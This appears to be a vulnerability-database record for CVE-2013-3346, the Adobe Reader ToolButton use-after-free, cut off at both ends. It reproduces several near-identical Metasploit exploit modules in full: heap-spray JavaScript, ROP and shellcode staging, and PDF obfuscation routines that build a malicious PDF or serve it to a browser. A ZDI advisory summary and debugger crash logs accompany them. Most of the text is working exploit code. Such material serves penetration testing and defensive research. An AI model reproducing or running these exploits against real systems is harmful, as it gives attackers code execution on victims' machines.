\nThis exception may be expected and handled. \neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 \neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 \nAcroRd32_60000000!PDFLTerm+0xbb7cd: \n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? \n \n* crash Adobe Reader 11.0.2 \n \n(940.d70): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll - \neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 \neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 \nAcroRd32_60000000!DllCanUnloadNow+0x1493ae: \n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? 
\n \n=end \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/124464/windows-browser-adobe_toolbutton.rb.txt"}, {"lastseen": "2016-12-05T22:16:24", "bulletinFamily": "exploit", "description": "", "modified": "2013-12-17T00:00:00", "published": "2013-12-17T00:00:00", "href": "https://packetstormsecurity.com/files/124463/Adobe-Reader-ToolButton-Use-After-Free.html", "id": "PACKETSTORM:124463", "type": "packetstorm", "title": "Adobe Reader ToolButton Use After Free", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::RopDb \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Reader ToolButton Use After Free', \n'Description' => %q{ \nThis module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 \nand 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where \nthe cEnable callback can be used to early free the object memory. Later use of the object \nallows triggering the use after free condition. This module has been tested successfully \non Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in \nNovember, 2013. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Soroush Dalili', # Vulnerability discovery \n'Unknown', # Exploit in the wild \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-3346' ], \n[ 'OSVDB', '96745' ], \n[ 'ZDI', '13-212' ], \n[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], \n[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] \n], \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP / Adobe Reader 9/10/11', { }], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Aug 08 2013', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), \n], self.class) \nend \n \ndef exploit \njs_data = make_js \n \n# Create the pdf \npdf = make_pdf(js_data) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(pdf) \nend \n \n \ndef make_js \n \n# CreateFileMappingA + MapViewOfFile + memcpy rop chain \nrop_9 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '9' })) \nrop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) \nrop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) \nescaped_payload = Rex::Text.to_unescape(payload.encoded) \n \njs = %Q| \nfunction heapSpray(str, str_addr, r_addr) { \nvar aaa = unescape(\"%u0c0c\"); \naaa += aaa; \nwhile ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; \nvar i1 = r_addr - 0x24; \nvar bbb = aaa.substring(0, i1 / 2); \nvar sa = str_addr; \nwhile (sa.length < (0x0c0c - r_addr)) sa += sa; \nbbb += sa; \nbbb += aaa; \nvar i11 = 0x0c0c - 0x24; \nbbb = bbb.substring(0, i11 / 2); \nbbb += str; \nbbb += aaa; \nvar i2 = 0x4000 + 0xc000; \nvar ccc = bbb.substring(0, i2 / 2); 
\nwhile (ccc.length < (0x40000 + 0x40000)) ccc += ccc; \nvar i3 = (0x1020 - 0x08) / 2; \nvar ddd = ccc.substring(0, 0x80000 - i3); \nvar eee = new Array(); \nfor (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\"; \nreturn; \n} \nvar shellcode = unescape(\"#{escaped_payload}\"); \nvar executable = \"\"; \nvar rop9 = unescape(\"#{rop_9}\"); \nvar rop10 = unescape(\"#{rop_10}\"); \nvar rop11 = unescape(\"#{rop_11}\"); \nvar r11 = false; \nvar vulnerable = true; \n \nvar obj_size; \nvar rop; \nvar ret_addr; \nvar rop_addr; \nvar r_addr; \n \nif (app.viewerVersion >= 9 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { \nobj_size = 0x330 + 0x1c; \nrop = rop9; \nret_addr = unescape(\"%ua83e%u4a82\"); \nrop_addr = unescape(\"%u08e8%u0c0c\"); \nr_addr = 0x08e8; \n} else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { \nobj_size = 0x360 + 0x1c; \nrop = rop10; \nrop_addr = unescape(\"%u08e4%u0c0c\"); \nr_addr = 0x08e4; \nret_addr = unescape(\"%ua8df%u4a82\"); \n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { \nr11 = true; \nobj_size = 0x370; \nrop = rop11; \nrop_addr = unescape(\"%u08a8%u0c0c\"); \nr_addr = 0x08a8; \nret_addr = unescape(\"%u8003%u4a84\"); \n} else { \nvulnerable = false; \n} \n \nif (vulnerable) { \nvar payload = rop + shellcode; \nheapSpray(payload, ret_addr, r_addr); \n \nvar part1 = \"\"; \nif (!r11) { \nfor (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\"); \n} \npart1 += rop_addr; \nvar part2 = \"\"; \nvar part2_len = obj_size - part1.length * 2; \nfor (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\"); \nvar arr = new Array(); \n \nremoveButtonFunc = function () { \napp.removeToolButton({ \ncName: \"evil\" \n}); \n \nfor (i = 0; i < 10; i++) arr[i] = part1.concat(part2); \n} \n \naddButtonFunc = function () { \napp.addToolButton({ \ncName: \"xxx\", \ncExec: \"1\", \ncEnable: \"removeButtonFunc();\" \n}); \n} \n \napp.addToolButton({ \ncName: \"evil\", \ncExec: 
\"1\", \ncEnable: \"addButtonFunc();\" \n}); \n} \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj \\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \n#return str \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(js) \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%PDF-1.5\" << eol \npdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Pages \") << ioRef(2) << eol \npdf << nObfu(\"/Type /Catalog\") << eol \npdf << nObfu(\"/OpenAction \") << ioRef(4) << eol \n# The AcroForm is required to get icucnv36.dll / icucnv40.dll to load \npdf << nObfu(\"/AcroForm \") << ioRef(6) << eol \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(2) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Kids [\") << ioRef(3) << \"]\" << eol \npdf << nObfu(\"/Count 1\") << eol \npdf << nObfu(\"/Type /Pages\") << eol \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Parent \") << ioRef(2) << eol \npdf << nObfu(\"/Type /Page\") << eol \npdf << nObfu(\">>\") << eol # end obj dict \npdf << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<<\") \npdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(5) \npdf << 
nObfu(\">>\") << eol \npdf << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(5) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n### \n# The following form related data is required to get icucnv36.dll / icucnv40.dll to load \n### \n \n# form object \nxref << pdf.length \npdf << ioDef(6) \npdf << nObfu(\"<</XFA \") << ioRef(7) << nObfu(\">>\") << eol \npdf << endobj \n \n# form stream \nxfa = <<-EOF \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\"> \n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\"> \n<present><pdf><interactive>1</interactive></pdf></present> \n</config> \n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\"> \n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\"> \n<pageSet></pageSet> \n</subform></template></xdp:xdp> \nEOF \n \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<</Length %s>>\" % xfa.length) << eol \npdf << \"stream\" << eol \npdf << xfa << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n### \n# end form stuff for icucnv36.dll / icucnv40.dll \n### \n \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n \n \n=begin \n \n* crash Adobe Reader 10.1.4 \n \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. 
\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 \neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 \nAcroRd32_60000000!PDFLTerm+0xbb7cd: \n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? \n \n* crash Adobe Reader 11.0.2 \n \n(940.d70): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll - \neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 \neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 \nAcroRd32_60000000!DllCanUnloadNow+0x1493ae: \n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? \n \n=end \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/124463/windows-fileformat-adobe_toolbutton.rb.txt"}], "zdi": [{"lastseen": "2016-11-09T00:17:52", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of the callbacks associated with ToolButton objects. A reference to the ToolButton object is kept when executing a callback which can lead to a use-after-free scenario if the callback removes the ToolButton object. 
An attacker can leverage this situation to execute code under the context of the user.", "modified": "2013-11-09T00:00:00", "published": "2013-09-11T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-212", "id": "ZDI-13-212", "title": "Adobe Reader ToolButton Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-10-15T05:39:30", "bulletinFamily": "exploit", "description": "This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used.\n", "modified": "2017-07-24T13:26:21", "published": "2013-12-16T20:13:47", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_TOOLBUTTON", "href": "", "type": "metasploit", "title": "Adobe Reader ToolButton Use After Free", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Adobe Reader ToolButton Use After Free\",\n 'Description' => %q{\n This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. 
The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to early free the object memory. Later use of the object\n allows triggering the use after free condition. This module has been tested successfully\n on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in\n November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order\n to exploit Adobe Reader 9 the fileformat version of the exploit can be used.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Soroush Dalili', # Vulnerability discovery\n 'Unknown', # Exploit in the wild\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-3346' ],\n [ 'OSVDB', '96745' ],\n [ 'ZDI', '13-212' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]\n ],\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => OperatingSystems::Match::WINDOWS_XP,\n :ua_name => Msf::HttpClients::IE\n },\n 'Targets' =>\n [\n [ 'Windows XP / IE / Adobe Reader 10/11', { } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Aug 08 2013\",\n 'DefaultTarget' => 0))\n\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"request: #{request.uri}\")\n js_data = make_js(cli, target_info)\n # Create the pdf\n pdf = make_pdf(js_data)\n print_status(\"Sending PDF...\")\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\n end\n\n def make_js(cli, target_info)\n # CreateFileMappingA + MapViewOfFile + memcpy rop chain\n rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' 
}))\n rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))\n escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))\n\n js = %Q|\nfunction heapSpray(str, str_addr, r_addr) {\n var aaa = unescape(\"%u0c0c\");\n aaa += aaa;\n while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;\n var i1 = r_addr - 0x24;\n var bbb = aaa.substring(0, i1 / 2);\n var sa = str_addr;\n while (sa.length < (0x0c0c - r_addr)) sa += sa;\n bbb += sa;\n bbb += aaa;\n var i11 = 0x0c0c - 0x24;\n bbb = bbb.substring(0, i11 / 2);\n bbb += str;\n bbb += aaa;\n var i2 = 0x4000 + 0xc000;\n var ccc = bbb.substring(0, i2 / 2);\n while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;\n var i3 = (0x1020 - 0x08) / 2;\n var ddd = ccc.substring(0, 0x80000 - i3);\n var eee = new Array();\n for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\";\n return;\n}\nvar shellcode = unescape(\"#{escaped_payload}\");\nvar executable = \"\";\nvar rop10 = unescape(\"#{rop_10}\");\nvar rop11 = unescape(\"#{rop_11}\");\nvar r11 = false;\nvar vulnerable = true;\n\nvar obj_size;\nvar rop;\nvar ret_addr;\nvar rop_addr;\nvar r_addr;\n\nif (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {\n obj_size = 0x360 + 0x1c;\n rop = rop10;\n rop_addr = unescape(\"%u08e4%u0c0c\");\n r_addr = 0x08e4;\n ret_addr = unescape(\"%ua8df%u4a82\");\n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {\n r11 = true;\n obj_size = 0x370;\n rop = rop11;\n rop_addr = unescape(\"%u08a8%u0c0c\");\n r_addr = 0x08a8;\n ret_addr = unescape(\"%u8003%u4a84\");\n} else {\n vulnerable = false;\n}\n\nif (vulnerable) {\n var payload = rop + shellcode;\n heapSpray(payload, ret_addr, r_addr);\n\n var part1 = \"\";\n if (!r11) {\n for (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\");\n }\n part1 += rop_addr;\n var part2 = \"\";\n var part2_len = obj_size - part1.length * 2;\n for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\");\n 
var arr = new Array();\n\n removeButtonFunc = function () {\n app.removeToolButton({\n cName: \"evil\"\n });\n\n for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);\n }\n\n addButtonFunc = function () {\n app.addToolButton({\n cName: \"xxx\",\n cExec: \"1\",\n cEnable: \"removeButtonFunc();\"\n });\n }\n\n app.addToolButton({\n cName: \"evil\",\n cExec: \"1\",\n cEnable: \"addButtonFunc();\"\n });\n}\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj \\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n #return str\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(js)\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Pages \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Catalog\") << eol\n pdf << n_obfu(\"/OpenAction \") << io_ref(4) << eol\n # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load\n pdf << n_obfu(\"/AcroForm \") << io_ref(6) << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Kids [\") << io_ref(3) << \"]\" << eol\n pdf << n_obfu(\"/Count 1\") << eol\n pdf << n_obfu(\"/Type /Pages\") << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n 
# page 1\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Parent \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Page\") << eol\n pdf << n_obfu(\">>\") << eol # end obj dict\n pdf << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/Action/S/JavaScript/JS \") + io_ref(5)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(5) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # The following form related data is required to get icucnv36.dll / icucnv40.dll to load\n ###\n\n # form object\n xref << pdf.length\n pdf << io_def(6)\n pdf << n_obfu(\"<</XFA \") << io_ref(7) << n_obfu(\">>\") << eol\n pdf << endobj\n\n # form stream\n xfa = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\n<present><pdf><interactive>1</interactive></pdf></present>\n</config>\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\n<pageSet></pageSet>\n</subform></template></xdp:xdp>\n EOF\n\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Length %s>>\" % xfa.length) << eol\n pdf << \"stream\" << eol\n pdf << xfa << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # end form stuff for icucnv36.dll / icucnv40.dll\n ###\n\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << 
\">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n\n\n=begin\n\n* crash Adobe Reader 10.1.4\n\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001\neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\nAcroRd32_60000000!PDFLTerm+0xbb7cd:\n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????\n\n* crash Adobe Reader 11.0.2\n\n(940.d70): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll -\neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000\neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\nAcroRd32_60000000!DllCanUnloadNow+0x1493ae:\n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????\n\n=end\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_toolbutton.rb"}, {"lastseen": "2019-11-29T21:08:15", "bulletinFamily": "exploit", "description": "This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. 
This module has been tested successfully on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in November, 2013.\n", "modified": "2017-09-14T02:03:34", "published": "2013-12-16T20:13:47", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_TOOLBUTTON", "href": "", "type": "metasploit", "title": "Adobe Reader ToolButton Use After Free", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::RopDb\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Reader ToolButton Use After Free',\n 'Description' => %q{\n This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to early free the object memory. Later use of the object\n allows triggering the use after free condition. 
This module has been tested successfully\n on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in\n November, 2013.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Soroush Dalili', # Vulnerability discovery\n 'Unknown', # Exploit in the wild\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-3346' ],\n [ 'OSVDB', '96745' ],\n [ 'ZDI', '13-212' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP / Adobe Reader 9/10/11', { }],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Aug 08 2013',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n js_data = make_js\n\n # Create the pdf\n pdf = make_pdf(js_data)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\n\n\n def make_js\n\n # CreateFileMappingA + MapViewOfFile + memcpy rop chain\n rop_9 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '9' }))\n rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))\n rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))\n escaped_payload = Rex::Text.to_unescape(payload.encoded)\n\n js = %Q|\nfunction heapSpray(str, str_addr, r_addr) {\n var aaa = unescape(\"%u0c0c\");\n aaa += aaa;\n while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;\n var i1 = r_addr - 0x24;\n var bbb = aaa.substring(0, i1 / 2);\n var sa = str_addr;\n while (sa.length < (0x0c0c - r_addr)) sa += sa;\n bbb += sa;\n bbb += aaa;\n var i11 = 0x0c0c - 0x24;\n 
